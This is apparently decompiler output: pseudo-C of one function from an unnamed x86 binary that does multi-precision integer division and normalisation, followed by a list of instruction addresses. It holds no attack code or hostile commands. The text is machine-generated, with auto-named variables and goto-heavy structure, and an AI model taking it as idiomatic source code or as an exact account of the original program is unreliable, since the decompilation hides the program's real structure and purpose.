				if(_t410 == 0) {
					goto L102;
				}
				_t411 =  *(_t755 - 4);
				if( *((intOrPtr*)( *(_t755 - 4) + 4)) == __ebx) {
					__eflags = __ebx | 0xffffffff;
					_t412 = E003A6732(_t411, __ebx | 0xffffffff);
				} else {
					_t412 = E003ABF04(_t411);
				}
				if(_t412 == 0) {
					goto L102;
				} else {
					_t562 =  *(_t755 - 4);
					_t413 =  *(_t562 + 4);
					 *(_t755 - 0x14) =  *(_t755 - 0x14) & 0x00000000;
					if(_t413 <= 0) {
						L9:
						if(( *(_t562 + 0x10) & 0x00000004) != 0 || ( *(_t755 - 0x50) & 0x00000004) != 0) {
							 *(_t755 - 0x14) = 1;
						}
						if( *((intOrPtr*)(_t755 - 0x5c)) == 0) {
							goto L102;
						} else {
							if( *(_t755 - 0x14) != 0) {
								L16:
								_t690 =  *((intOrPtr*)(_t755 + 0x10));
								E003AA694( *((intOrPtr*)(_t755 + 0x10)));
								 *(_t755 - 0x20) = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
								_t558 = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
								_t420 = E003AA715(_t690);
								__eflags =  *(_t755 - 0x20);
								_t736 = _t420;
								 *(_t755 - 0x1c) = _t736;
								if( *(_t755 - 0x20) == 0) {
									L179:
									E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
									goto L102;
								}
								__eflags = _t558;
								if(_t558 == 0) {
									goto L179;
								}
								__eflags = _t736;
								if(_t736 == 0) {
									goto L179;
								}
								_t651 = _t755 - 0x60;
								_t424 = E003A6518(_t755 - 0x60) & 0x8000001f;
								__eflags = _t424;
								if(_t424 < 0) {
									_t424 = (_t424 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t424;
								}
								_t691 = 0x20;
								_t692 = _t691 - _t424;
								_t426 = E003AA920(_t651, _t736, _t755 - 0x60, _t691 - _t424);
								_t761 = _t760 + 0xc;
								__eflags = _t426;
								if(_t426 == 0) {
									goto L179;
								} else {
									 *(_t736 + 0xc) =  *(_t736 + 0xc) & 0x00000000;
									_t427 = E003AA920(_t651, _t558,  *(_t755 - 4), _t692 + 0x20);
									_t760 = _t761 + 0xc;
									__eflags = _t427;
									if(_t427 == 0) {
										goto L179;
									}
									 *(_t558 + 0xc) =  *(_t558 + 0xc) & 0x00000000;
									__eflags =  *(_t755 - 0x14);
									if( *(_t755 - 0x14) == 0) {
										L38:
										_t563 =  *(_t755 - 0x1c);
										_t737 =  *(_t563 + 4);
										_t428 =  *_t558;
										_t564 =  *_t563;
										 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
										_t695 =  *(_t558 + 4) - _t737;
										 *((intOrPtr*)(_t755 - 0x74)) = _t428 + _t695 * 4;
										 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t558 + 8)) - _t695;
										 *(_t755 - 0x64) =  *(_t558 + 0x10) | 0x00000002;
										 *(_t755 - 0x30) = _t737;
										 *(_t755 - 0x2c) = _t695;
										 *(_t755 - 0x70) = _t737;
										 *(_t755 - 0x18) =  *(_t564 + _t737 * 4 - 4);
										__eflags = _t737 - 1;
										if(_t737 != 1) {
											 *(_t755 - 0x28) =  *(_t564 + _t737 * 4 - 8);
										} else {
											 *(_t755 - 0x28) =  *(_t755 - 0x28) & 0x00000000;
										}
										 *(_t755 - 0x10) = _t428 +  *(_t558 + 4) * 4 - 4;
										_t430 =  *(_t755 - 4);
										 *(_t430 + 0xc) =  *(_t430 + 0xc) ^  *(_t755 - 0x54);
										_t568 = _t695 + 1;
										__eflags = _t568 -  *((intOrPtr*)(_t430 + 8));
										if(_t568 >  *((intOrPtr*)(_t430 + 8))) {
											_t430 = E003A665B(_t568, _t430);
											_t695 =  *(_t755 - 0x2c);
											_t737 =  *(_t755 - 0x30);
										}
										__eflags = _t430;
										if(_t430 == 0) {
											goto L179;
										} else {
											_t431 =  *(_t755 - 4);
											 *((intOrPtr*)(_t431 + 4)) = _t695 -  *(_t755 - 0x14);
											_t571 =  *(_t755 - 0x20);
											 *(_t755 - 0xc) =  *_t431 + _t695 * 4 - 4;
											_t434 = _t737 + 1;
											 *(_t755 - 0x34) = _t434;
											__eflags = _t434 -  *((intOrPtr*)(_t571 + 8));
											if(_t434 >  *((intOrPtr*)(_t571 + 8))) {
												_t435 = E003A665B( *(_t755 - 0x34), _t571);
												_t695 =  *(_t755 - 0x2c);
												_t737 =  *(_t755 - 0x30);
											} else {
												_t435 = _t571;
											}
											__eflags = _t435;
											if(_t435 == 0) {
												goto L179;
											} else {
												__eflags =  *(_t755 - 0x14);
												if( *(_t755 - 0x14) == 0) {
													_t536 = E003A687A(_t755 - 0x74,  *(_t755 - 0x1c));
													__eflags = _t536;
													if(_t536 < 0) {
														_t537 =  *(_t755 - 4);
														_t118 = _t537 + 4;
														 *_t118 =  *(_t537 + 4) - 1;
														__eflags =  *_t118;
													} else {
														E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t737);
														 *( *(_t755 - 0xc)) = 1;
													}
												}
												_t436 =  *(_t755 - 4);
												__eflags =  *(_t436 + 4);
												if( *(_t436 + 4) != 0) {
													_t124 = _t755 - 0xc;
													 *_t124 =  *(_t755 - 0xc) - 4;
													__eflags =  *_t124;
												} else {
													 *(_t436 + 0xc) =  *(_t436 + 0xc) & 0x00000000;
												}
												_t697 = _t695 - 1;
												__eflags = _t697;
												if(_t697 <= 0) {
													L76:
													_t437 =  *(_t558 + 4);
													_t658 = 0;
													__eflags = _t437;
													if(_t437 <= 0) {
														L80:
														__eflags =  *(_t755 - 0x14) - _t658;
														if( *(_t755 - 0x14) == _t658) {
															L85:
															E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
															_t734 =  *((intOrPtr*)(_t755 + 8));
															_t698 =  *(_t755 - 4);
															L86:
															if( *((intOrPtr*)(_t698 + 4)) <= 0) {
																_t440 = 0;
																__eflags = 0;
															} else {
																_t440 =  *((intOrPtr*)( *_t698));
															}
															 *(_t734 + 0x44) =  *(_t734 + 0x44) & 0x00000000;
															 *((intOrPtr*)(_t734 + 0x40)) = _t440;
															E003A6732( *((intOrPtr*)(_t755 - 8)), 0);
															_t740 =  *_t734 +  *_t734;
															if( *_t734 +  *_t734 < 0 || E003A68B4( *((intOrPtr*)(_t755 - 8)), _t740, _t658) == 0) {
																goto L102;
															} else {
																_t573 =  *((intOrPtr*)(_t755 - 8));
																_t445 =  *(_t573 + 4);
																 *(_t755 - 0x10) =  *(_t755 - 0x10) & 0;
																if(_t445 <= 0) {
																	L94:
																	if(( *(_t573 + 0x10) & 0x00000004) != 0 || ( *( *((intOrPtr*)(_t755 - 0x24)) + 0x10) & 0x00000004) != 0) {
																		 *(_t755 - 0x10) = 1;
																	}
																	_t446 =  *((intOrPtr*)(_t755 - 0x24));
																	if( *((intOrPtr*)( *((intOrPtr*)(_t755 - 0x24)) + 4)) == 0) {
																		goto L102;
																	} else {
																		if( *(_t755 - 0x10) != 0 || E003A687A( *((intOrPtr*)(_t755 - 8)), _t446) >= 0) {
																			_t699 =  *((intOrPtr*)(_t755 + 0x10));
																			E003AA694( *((intOrPtr*)(_t755 + 0x10)));
																			 *(_t755 - 0x18) = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
																			_t560 = E003AA715( *((intOrPtr*)(_t755 + 0x10)));
																			_t741 = E003AA715(_t699);
																			 *(_t755 - 0x1c) = _t741;
																			_t455 = E003AA715(_t699);
																			__eflags =  *(_t755 - 0x18);
																			 *(_t755 - 4) = _t455;
																			if( *(_t755 - 0x18) == 0) {
																				goto L179;
																			}
																			__eflags = _t560;
																			if(_t560 == 0) {
																				goto L179;
																			}
																			__eflags = _t741;
																			if(_t741 == 0) {
																				goto L179;
																			}
																			__eflags = _t455;
																			if(_t455 == 0) {
																				goto L179;
																			}
																			_t659 =  *((intOrPtr*)(_t755 - 0x24));
																			_t457 = E003A6518( *((intOrPtr*)(_t755 - 0x24))) & 0x8000001f;
																			__eflags = _t457;
																			if(_t457 < 0) {
																				_t457 = (_t457 - 0x00000001 | 0xffffffe0) + 1;
																				__eflags = _t457;
																			}
																			_t700 = 0x20;
																			_t701 = _t700 - _t457;
																			_t458 = E003AA920(_t659, _t741, _t659, _t701);
																			__eflags = _t458;
																			if(_t458 == 0) {
																				goto L179;
																			} else {
																				 *(_t741 + 0xc) =  *(_t741 + 0xc) & 0x00000000;
																				 *((intOrPtr*)(_t755 - 0x48)) = _t701 + 0x20;
																				_t459 = E003AA920(_t659, _t560,  *((intOrPtr*)(_t755 - 8)), _t701 + 0x20);
																				__eflags = _t459;
																				if(_t459 == 0) {
																					goto L179;
																				}
																				 *(_t560 + 0xc) =  *(_t560 + 0xc) & 0x00000000;
																				__eflags =  *(_t755 - 0x10);
																				if( *(_t755 - 0x10) == 0) {
																					L128:
																					_t574 =  *(_t755 - 0x1c);
																					_t742 =  *(_t574 + 4);
																					_t460 =  *_t560;
																					_t575 =  *_t574;
																					 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
																					_t704 =  *(_t560 + 4) - _t742;
																					 *((intOrPtr*)(_t755 - 0x74)) = _t460 + _t704 * 4;
																					 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t560 + 8)) - _t704;
																					 *(_t755 - 0x64) =  *(_t560 + 0x10) | 0x00000002;
																					_t665 =  *(_t575 + _t742 * 4 - 4);
																					 *(_t755 - 0x30) = _t742;
																					 *(_t755 - 0x34) = _t704;
																					 *(_t755 - 0x70) = _t742;
																					 *(_t755 - 0x20) =  *(_t575 + _t742 * 4 - 4);
																					__eflags = _t742 - 1;
																					if(_t742 != 1) {
																						 *(_t755 - 0x2c) =  *(_t575 + _t742 * 4 - 8);
																					} else {
																						 *(_t755 - 0x2c) =  *(_t755 - 0x2c) & 0x00000000;
																					}
																					 *(_t755 - 0x14) = _t460 +  *(_t560 + 4) * 4 - 4;
																					_t579 =  *(_t755 - 4);
																					 *(_t579 + 0xc) =  *( *((intOrPtr*)(_t755 - 0x24)) + 0xc) ^  *( *((intOrPtr*)(_t755 - 8)) + 0xc);
																					_t465 = _t704 + 1;
																					__eflags = _t465 -  *((intOrPtr*)(_t579 + 8));
																					if(_t465 >  *((intOrPtr*)(_t579 + 8))) {
																						_t466 = E003A665B(_t465,  *(_t755 - 4));
																						_t704 =  *(_t755 - 0x34);
																						_t742 =  *(_t755 - 0x30);
																					} else {
																						_t466 = _t579;
																					}
																					__eflags = _t466;
																					if(_t466 == 0) {
																						goto L179;
																					} else {
																						_t467 =  *(_t755 - 4);
																						 *((intOrPtr*)(_t467 + 4)) = _t704 -  *(_t755 - 0x10);
																						_t582 =  *(_t755 - 0x18);
																						 *(_t755 - 0x28) =  *_t467 + _t704 * 4 - 4;
																						_t470 = _t742 + 1;
																						 *((intOrPtr*)(_t755 - 0x24)) = _t470;
																						__eflags = _t470 -  *((intOrPtr*)(_t582 + 8));
																						if(_t470 >  *((intOrPtr*)(_t582 + 8))) {
																							_t471 = E003A665B( *((intOrPtr*)(_t755 - 0x24)),  *(_t755 - 0x18));
																							_t704 =  *(_t755 - 0x34);
																							_t742 =  *(_t755 - 0x30);
																						} else {
																							_t471 = _t582;
																						}
																						__eflags = _t471;
																						if(_t471 == 0) {
																							goto L179;
																						} else {
																							__eflags =  *(_t755 - 0x10);
																							if( *(_t755 - 0x10) == 0) {
																								_t665 =  *(_t755 - 0x1c);
																								_t497 = E003A687A(_t755 - 0x74,  *(_t755 - 0x1c));
																								__eflags = _t497;
																								if(_t497 < 0) {
																									_t498 =  *(_t755 - 4);
																									_t325 = _t498 + 4;
																									 *_t325 =  *(_t498 + 4) - 1;
																									__eflags =  *_t325;
																								} else {
																									_t665 =  *( *(_t755 - 0x1c));
																									E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t742);
																									 *( *(_t755 - 0x28)) = 1;
																								}
																							}
																							_t472 =  *(_t755 - 4);
																							__eflags =  *(_t472 + 4);
																							if( *(_t472 + 4) != 0) {
																								_t331 = _t755 - 0x28;
																								 *_t331 =  *(_t755 - 0x28) - 4;
																								__eflags =  *_t331;
																							} else {
																								 *(_t472 + 0xc) =  *(_t472 + 0xc) & 0x00000000;
																							}
																							_t707 = _t704 - 1;
																							__eflags = _t707;
																							if(_t707 <= 0) {
																								L167:
																								_t473 =  *(_t560 + 4);
																								__eflags = _t473;
																								if(_t473 <= 0) {
																									L171:
																									_t745 =  *((intOrPtr*)(_t755 - 8));
																									_t708 =  *((intOrPtr*)(_t745 + 0xc));
																									E003AAA38( *((intOrPtr*)(_t755 - 0x48)), _t560, _t665, _t745);
																									__eflags =  *(_t745 + 4);
																									if( *(_t745 + 4) != 0) {
																										 *((intOrPtr*)(_t745 + 0xc)) = _t708;
																									}
																									__eflags =  *(_t755 - 0x10);
																									if( *(_t755 - 0x10) == 0) {
																										L178:
																										E003AA6BB( *((intOrPtr*)(_t755 + 0x10)));
																										goto L101;
																									}
																									_t478 =  *(_t755 - 4);
																									_t585 =  *(_t478 + 4);
																									__eflags = _t585;
																									if(_t585 <= 0) {
																										goto L178;
																									}
																									_t586 =  *_t478 + _t585 * 4 - 4;
																									while(1) {
																										_t747 =  *_t586;
																										_t586 = _t586 - 4;
																										__eflags = _t747;
																										if(_t747 != 0) {
																											goto L178;
																										}
																										 *(_t478 + 4) =  *(_t478 + 4) - 1;
																										__eflags =  *(_t478 + 4);
																										if( *(_t478 + 4) > 0) {
																											continue;
																										}
																										goto L178;
																									}
																									goto L178;
																								}
																								_t479 =  *_t560 + _t473 * 4 - 4;
																								while(1) {
																									_t588 =  *_t479;
																									_t479 = _t479 - 4;
																									__eflags = _t588;
																									if(_t588 != 0) {
																										goto L171;
																									}
																									 *(_t560 + 4) =  *(_t560 + 4) - 1;
																									__eflags =  *(_t560 + 4) - _t588;
																									if( *(_t560 + 4) > _t588) {
																										continue;
																									}
																									goto L171;
																								}
																								goto L171;
																							} else {
																								_t481 =  *(_t755 - 0x28) -  *(_t755 - 0x14);
																								__eflags = _t481;
																								 *(_t755 - 0x30) = _t707;
																								 *(_t755 - 0x3c) = _t481;
																								do {
																									_t589 =  *(_t755 - 0x14);
																									_t482 =  *_t589;
																									_t709 =  *((intOrPtr*)(_t589 - 4));
																									__eflags =  *_t589 -  *(_t755 - 0x20);
																									if( *_t589 !=  *(_t755 - 0x20)) {
																										_t483 = E003A6F02(_t482, _t709,  *(_t755 - 0x20));
																										 *((intOrPtr*)(_t755 - 0x40)) = _t709 - _t483 *  *(_t755 - 0x20);
																										 *(_t755 - 0xc) = _t483;
																										_t484 =  *(_t755 - 0x2c);
																										_t667 = _t484 & 0x0000ffff;
																										 *(_t755 - 0x34) = _t483 & 0x0000ffff;
																										_t712 = _t483 >> 0x10;
																										_t485 = _t484 >> 0x10;
																										_t668 = _t667 *  *(_t755 - 0x34);
																										 *(_t755 - 0x44) = _t712;
																										_t486 = _t485 *  *(_t755 - 0x44);
																										_t714 = _t485 *  *(_t755 - 0x34);
																										_t597 = _t667 * _t712 + _t714;
																										 *(_t755 - 0x34) = _t714;
																										__eflags = _t597 - _t714;
																										if(_t597 < _t714) {
																											_t486 = _t486 + 0x10000;
																											__eflags = _t486;
																										}
																										_t598 = _t597 << 0x10;
																										_t669 = _t668 + _t598;
																										_t487 = _t486 + (_t597 >> 0x10);
																										__eflags = _t669 - _t598;
																										if(_t669 < _t598) {
																											_t487 = _t487 + 1;
																											__eflags = _t487;
																										}
																										_t599 =  *((intOrPtr*)(_t755 - 0x40));
																										while(1) {
																											__eflags = _t487 - _t599;
																											if(__eflags < 0) {
																												break;
																											}
																											if(__eflags != 0) {
																												L157:
																												_t599 = _t599 +  *(_t755 - 0x20);
																												 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																												__eflags = _t599 -  *(_t755 - 0x20);
																												if(_t599 <  *(_t755 - 0x20)) {
																													break;
																												}
																												__eflags = _t669 -  *(_t755 - 0x2c);
																												if(_t669 <  *(_t755 - 0x2c)) {
																													_t487 = _t487 - 1;
																													__eflags = _t487;
																												}
																												_t669 = _t669 -  *(_t755 - 0x2c);
																												__eflags = _t669;
																												continue;
																											}
																											_t718 =  *(_t755 - 0x14);
																											__eflags = _t669 -  *((intOrPtr*)(_t718 - 8));
																											if(_t669 <=  *((intOrPtr*)(_t718 - 8))) {
																												break;
																											}
																											goto L157;
																										}
																										L162:
																										_t717 =  *(_t755 - 0x1c);
																										_t489 = E003A6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x18)), _t742);
																										 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
																										 *((intOrPtr*)( *( *(_t755 - 0x18)) + _t742 * 4)) = _t489;
																										_t491 = E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x18)),  *((intOrPtr*)(_t755 - 0x24)));
																										__eflags = _t491;
																										if(_t491 == 0) {
																											L165:
																											_t492 =  *(_t755 - 0x14);
																											goto L166;
																										}
																										 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																										_t495 = E003A6FFC( *_t717,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t742);
																										__eflags = _t495;
																										if(_t495 == 0) {
																											goto L165;
																										}
																										_t492 =  *(_t755 - 0x14);
																										 *_t492 =  *_t492 + 1;
																										goto L166;
																									}
																									 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
																									goto L162;
																									L166:
																									_t665 =  *(_t755 - 0xc);
																									 *( *(_t755 - 0x3c) + _t492) =  *(_t755 - 0xc);
																									_t380 = _t755 - 0x30;
																									 *_t380 =  *(_t755 - 0x30) - 1;
																									__eflags =  *_t380;
																									 *(_t755 - 0x14) = _t492 - 4;
																								} while ( *_t380 != 0);
																								goto L167;
																							}
																						}
																					}
																				}
																				_t503 =  *((intOrPtr*)(_t741 + 4));
																				_t610 =  *(_t560 + 4);
																				__eflags = _t610 - _t503 + 1;
																				if(_t610 > _t503 + 1) {
																					_t719 = _t610 + 1;
																					__eflags = _t610 + 1 -  *((intOrPtr*)(_t560 + 8));
																					if(_t610 + 1 >  *((intOrPtr*)(_t560 + 8))) {
																						_t504 = E003A665B(_t719, _t560);
																					} else {
																						_t504 = _t560;
																					}
																					__eflags = _t504;
																					if(_t504 == 0) {
																						goto L179;
																					} else {
																						 *( *_t560 +  *(_t560 + 4) * 4) =  *( *_t560 +  *(_t560 + 4) * 4) & 0x00000000;
																						_t260 = _t560 + 4;
																						 *_t260 =  *(_t560 + 4) + 1;
																						__eflags =  *_t260;
																						goto L128;
																					}
																				}
																				_t720 = _t503 + 2;
																				__eflags = _t503 + 2 -  *((intOrPtr*)(_t560 + 8));
																				if(_t503 + 2 >  *((intOrPtr*)(_t560 + 8))) {
																					_t506 = E003A665B(_t720, _t560);
																					_t741 =  *(_t755 - 0x1c);
																				} else {
																					_t506 = _t560;
																				}
																				__eflags = _t506;
																				if(_t506 == 0) {
																					goto L179;
																				} else {
																					_t507 =  *(_t560 + 4);
																					while(1) {
																						__eflags = _t507 -  *((intOrPtr*)(_t741 + 4)) + 2;
																						if(_t507 >=  *((intOrPtr*)(_t741 + 4)) + 2) {
																							break;
																						}
																						 *( *_t560 + _t507 * 4) =  *( *_t560 + _t507 * 4) & 0x00000000;
																						_t507 = _t507 + 1;
																						__eflags = _t507;
																					}
																					 *(_t560 + 4) =  *((intOrPtr*)(_t741 + 4)) + 2;
																					goto L128;
																				}
																			}
																		} else {
																			if(E003A669B(_t573,  *((intOrPtr*)(_t755 - 8)),  *((intOrPtr*)(_t755 - 8))) == 0) {
																				goto L102;
																			}
																			L101:
																			 *(_t755 - 0x38) = 1;
																			goto L102;
																		}
																	}
																}
																if( *((intOrPtr*)( *_t573 + _t445 * 4 - 4)) == 0) {
																	goto L102;
																}
																_t573 =  *((intOrPtr*)(_t755 - 8));
																goto L94;
															}
														}
														_t517 =  *(_t755 - 4);
														_t618 =  *(_t517 + 4);
														__eflags = _t618 - _t658;
														if(_t618 <= _t658) {
															goto L85;
														}
														_t619 =  *_t517 + _t618 * 4 - 4;
														while(1) {
															_t751 =  *_t619;
															_t619 = _t619 - 4;
															__eflags = _t751;
															if(_t751 != 0) {
																goto L85;
															}
															 *(_t517 + 4) =  *(_t517 + 4) - 1;
															__eflags =  *(_t517 + 4) - _t658;
															if( *(_t517 + 4) > _t658) {
																continue;
															}
															goto L85;
														}
														goto L85;
													}
													_t518 =  *_t558 + _t437 * 4 - 4;
													while(1) {
														_t621 =  *_t518;
														_t518 = _t518 - 4;
														__eflags = _t621;
														if(_t621 != 0) {
															goto L80;
														}
														 *(_t558 + 4) =  *(_t558 + 4) - 1;
														__eflags =  *(_t558 + 4) - _t658;
														if( *(_t558 + 4) > _t658) {
															continue;
														}
														goto L80;
													}
													goto L80;
												} else {
													_t520 =  *(_t755 - 0xc) -  *(_t755 - 0x10);
													__eflags = _t520;
													 *(_t755 - 0x2c) = _t697;
													 *(_t755 - 0x44) = _t520;
													do {
														_t622 =  *(_t755 - 0x10);
														_t521 =  *_t622;
														_t721 =  *((intOrPtr*)(_t622 - 4));
														__eflags =  *_t622 -  *(_t755 - 0x18);
														if( *_t622 !=  *(_t755 - 0x18)) {
															_t522 = E003A6F02(_t521, _t721,  *(_t755 - 0x18));
															 *((intOrPtr*)(_t755 - 0x40)) = _t721 - _t522 *  *(_t755 - 0x18);
															 *(_t755 - 0xc) = _t522;
															_t523 =  *(_t755 - 0x28);
															_t677 = _t523 & 0x0000ffff;
															 *(_t755 - 0x30) = _t522 & 0x0000ffff;
															_t724 = _t522 >> 0x10;
															_t524 = _t523 >> 0x10;
															_t678 = _t677 *  *(_t755 - 0x30);
															 *(_t755 - 0x3c) = _t724;
															_t525 = _t524 *  *(_t755 - 0x3c);
															_t726 = _t524 *  *(_t755 - 0x30);
															_t630 = _t677 * _t724 + _t726;
															 *(_t755 - 0x30) = _t726;
															__eflags = _t630 - _t726;
															if(_t630 < _t726) {
																_t525 = _t525 + 0x10000;
																__eflags = _t525;
															}
															_t631 = _t630 << 0x10;
															_t679 = _t678 + _t631;
															_t526 = _t525 + (_t630 >> 0x10);
															__eflags = _t679 - _t631;
															if(_t679 < _t631) {
																_t526 = _t526 + 1;
																__eflags = _t526;
															}
															_t632 =  *((intOrPtr*)(_t755 - 0x40));
															while(1) {
																__eflags = _t526 - _t632;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags != 0) {
																	L66:
																	_t632 = _t632 +  *(_t755 - 0x18);
																	 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
																	__eflags = _t632 -  *(_t755 - 0x18);
																	if(_t632 <  *(_t755 - 0x18)) {
																		break;
																	}
																	__eflags = _t679 -  *(_t755 - 0x28);
																	if(_t679 <  *(_t755 - 0x28)) {
																		_t526 = _t526 - 1;
																		__eflags = _t526;
																	}
																	_t679 = _t679 -  *(_t755 - 0x28);
																	__eflags = _t679;
																	continue;
																}
																_t730 =  *(_t755 - 0x10);
																__eflags = _t679 -  *((intOrPtr*)(_t730 - 8));
																if(_t679 <=  *((intOrPtr*)(_t730 - 8))) {
																	break;
																}
																goto L66;
															}
															L71:
															_t729 =  *(_t755 - 0x1c);
															_t528 = E003A6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x20)), _t737);
															 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
															 *((intOrPtr*)( *( *(_t755 - 0x20)) + _t737 * 4)) = _t528;
															_t530 = E003A70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x20)),  *(_t755 - 0x34));
															__eflags = _t530;
															if(_t530 == 0) {
																L74:
																_t531 =  *(_t755 - 0x10);
																goto L75;
															}
															 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
															_t534 = E003A6FFC( *_t729,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t737);
															__eflags = _t534;
															if(_t534 == 0) {
																goto L74;
															}
															_t531 =  *(_t755 - 0x10);
															 *_t531 =  *_t531 + 1;
															goto L75;
														}
														 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
														goto L71;
														L75:
														 *( *(_t755 - 0x44) + _t531) =  *(_t755 - 0xc);
														_t173 = _t755 - 0x2c;
														 *_t173 =  *(_t755 - 0x2c) - 1;
														__eflags =  *_t173;
														 *(_t755 - 0x10) = _t531 - 4;
													} while ( *_t173 != 0);
													goto L76;
												}
											}
										}
									}
									_t542 =  *((intOrPtr*)(_t736 + 4));
									_t643 =  *(_t558 + 4);
									__eflags = _t643 - _t542 + 1;
									if(_t643 > _t542 + 1) {
										_t732 = _t643 + 1;
										__eflags = _t643 + 1 -  *((intOrPtr*)(_t558 + 8));
										if(_t643 + 1 >  *((intOrPtr*)(_t558 + 8))) {
											_t543 = E003A665B(_t732, _t558);
										} else {
											_t543 = _t558;
										}
										__eflags = _t543;
										if(_t543 == 0) {
											goto L179;
										} else {
											 *( *_t558 +  *(_t558 + 4) * 4) =  *( *_t558 +  *(_t558 + 4) * 4) & 0x00000000;
											_t57 = _t558 + 4;
											 *_t57 =  *(_t558 + 4) + 1;
											__eflags =  *_t57;
											goto L38;
										}
									}
									_t733 = _t542 + 2;
									__eflags = _t542 + 2 -  *((intOrPtr*)(_t558 + 8));
									if(_t542 + 2 >  *((intOrPtr*)(_t558 + 8))) {
										_t545 = E003A665B(_t733, _t558);
										_t736 =  *(_t755 - 0x1c);
									} else {
										_t545 = _t558;
									}
									__eflags = _t545;
									if(_t545 == 0) {
										goto L179;
									} else {
										_t546 =  *(_t558 + 4);
										while(1) {
											__eflags = _t546 -  *((intOrPtr*)(_t736 + 4)) + 2;
											if(_t546 >=  *((intOrPtr*)(_t736 + 4)) + 2) {
												break;
											}
											 *( *_t558 + _t546 * 4) =  *( *_t558 + _t546 * 4) & 0x00000000;
											_t546 = _t546 + 1;
											__eflags = _t546;
										}
										 *(_t558 + 4) =  *((intOrPtr*)(_t736 + 4)) + 2;
										goto L38;
									}
								}
							}
							_t698 =  *(_t755 - 4);
							_t658 = _t755 - 0x60;
							if(E003A687A(_t698, _t755 - 0x60) >= 0) {
								goto L16;
							}
							E003A6732(_t698, 0);
							goto L86;
						}
					}
					if( *((intOrPtr*)( *_t562 + _t413 * 4 - 4)) == 0) {
						goto L102;
					}
					_t562 =  *(_t755 - 4);
					goto L9;
				}
			}



































































































































    0x003ae04d
    0x003ae04d
    0x003ae052
    0x003ae507
    0x003ae50c
    0x003ae516
    0x003ae516
    0x003ae060
    0x003ae065
    0x003ae06a
    0x00000000
    0x00000000
    0x003ae070
    0x003ae076
    0x003ae081
    0x003ae084
    0x003ae078
    0x003ae07a
    0x003ae07a
    0x003ae08b
    0x00000000
    0x003ae091
    0x003ae091
    0x003ae094
    0x003ae097
    0x003ae09d
    0x003ae0af
    0x003ae0b3
    0x003ae0bb
    0x003ae0bb
    0x003ae0c6
    0x00000000
    0x003ae0cc
    0x003ae0d0
    0x003ae0f1
    0x003ae0f1
    0x003ae0f4
    0x003ae100
    0x003ae10a
    0x003ae10e
    0x003ae113
    0x003ae117
    0x003ae119
    0x003ae11c
    0x003ae8d3
    0x003ae8d6
    0x00000000
    0x003ae8d6
    0x003ae122
    0x003ae124
    0x00000000
    0x00000000
    0x003ae12a
    0x003ae12c
    0x00000000
    0x00000000
    0x003ae132
    0x003ae13a
    0x003ae13a
    0x003ae13f
    0x003ae145
    0x003ae145
    0x003ae145
    0x003ae148
    0x003ae149
    0x003ae151
    0x003ae156
    0x003ae159
    0x003ae15b
    0x00000000
    0x003ae161
    0x003ae161
    0x003ae16d
    0x003ae172
    0x003ae175
    0x003ae177
    0x00000000
    0x00000000
    0x003ae17d
    0x003ae181
    0x003ae185
    0x003ae1fa
    0x003ae1fa
    0x003ae1fd
    0x003ae203
    0x003ae205
    0x003ae207
    0x003ae20b
    0x003ae210
    0x003ae218
    0x003ae221
    0x003ae228
    0x003ae22b
    0x003ae22e
    0x003ae231
    0x003ae234
    0x003ae237
    0x003ae243
    0x003ae239
    0x003ae239
    0x003ae239
    0x003ae250
    0x003ae253
    0x003ae256
    0x003ae259
    0x003ae25c
    0x003ae25f
    0x003ae265
    0x003ae26a
    0x003ae26d
    0x003ae26d
    0x003ae270
    0x003ae272
    0x00000000
    0x003ae278
    0x003ae278
    0x003ae280
    0x003ae285
    0x003ae28c
    0x003ae28f
    0x003ae292
    0x003ae295
    0x003ae298
    0x003ae2a3
    0x003ae2a8
    0x003ae2ab
    0x003ae29a
    0x003ae29a
    0x003ae29a
    0x003ae2ae
    0x003ae2b0
    0x00000000
    0x003ae2b6
    0x003ae2b6
    0x003ae2ba
    0x003ae2c2
    0x003ae2c7
    0x003ae2c9
    0x003ae2e7
    0x003ae2ea
    0x003ae2ea
    0x003ae2ea
    0x003ae2cb
    0x003ae2d6
    0x003ae2df
    0x003ae2df
    0x003ae2c9
    0x003ae2ed
    0x003ae2f0
    0x003ae2f4
    0x003ae2fc
    0x003ae2fc
    0x003ae2fc
    0x003ae2f6
    0x003ae2f6
    0x003ae2f6
    0x003ae300
    0x003ae301
    0x003ae303
    0x003ae41f
    0x003ae41f
    0x003ae422
    0x003ae424
    0x003ae426
    0x003ae43f
    0x003ae43f
    0x003ae442
    0x003ae465
    0x003ae468
    0x003ae46d
    0x003ae470
    0x003ae473
    0x003ae477
    0x003ae47f
    0x003ae47f
    0x003ae479
